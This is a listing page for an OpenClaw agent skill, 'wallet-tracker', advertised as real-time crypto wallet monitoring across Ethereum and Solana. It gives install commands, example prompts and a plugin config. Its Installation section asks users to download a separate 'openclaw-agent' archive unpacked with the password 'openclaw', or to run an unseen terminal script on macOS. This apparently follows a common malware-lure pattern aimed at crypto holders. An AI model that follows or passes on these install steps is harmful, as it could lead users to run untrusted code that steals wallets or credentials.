wallet-tracker
Track blockchain addresses in real-time - monitor whale movements, get alerts on transactions, analyze portfolio changes across Ethereum, Solana, and other chains.
Why use this skill?
Monitor whale movements, token transfers, and portfolio changes across Ethereum and Solana in real-time with the OpenClaw wallet-tracker skill.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-bf3bsWhat This Skill Does
The wallet-tracker skill is a robust blockchain monitoring tool designed for OpenClaw AI agents. It enables users to observe on-chain activity in real-time, providing deep insights into Ethereum, Solana, and other supported chains. By integrating with the openclaw-agent utility, this skill allows for granular monitoring of large transactions (whale movements), ERC-20 token transfers, NFT flow, and specific DeFi interactions. It transforms raw blockchain data into readable logs, allowing your agent to report on portfolio changes or alert you to significant liquidity shifts as they happen on the ledger.
Installation
To get started, you must first install the required agent utility. On Windows, download the openclaw-agent and extract it using the password 'openclaw'. For macOS users, visit the installation page and execute the provided terminal script. Once the base agent is active, install the specific skill within OpenClaw by running: clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-bf3bs.
Use Cases
This skill is perfect for traders, data analysts, and developers. Use it to build an automated 'whale-watching' bot that logs movements of high-value wallets. It is also ideal for monitoring your own portfolio performance across different wallets to identify token transfers instantly. Developers can utilize the included Python templates to trigger webhooks or notifications whenever a specific block threshold is crossed, ensuring they never miss critical market events.
Example Prompts
- "OpenClaw, start tracking this Ethereum address 0x123... and alert me whenever a transaction exceeds 50 ETH."
- "Can you give me a summary of the last 10 ERC-20 token transfers for my Solana wallet address?"
- "Set up a continuous monitor for this whale wallet and print a report every time they interact with a Uniswap pool."
Tips & Limitations
Always ensure your API keys (such as Etherscan) are kept secure. The tracker relies on periodic polling; for ultra-low latency requirements, consider adjusting the interval settings in the Python script. Be aware that tracking a massive number of addresses simultaneously may increase API rate limiting, so configure your update intervals thoughtfully to balance performance and data freshness.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-wallet-tracker-bf3bs": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.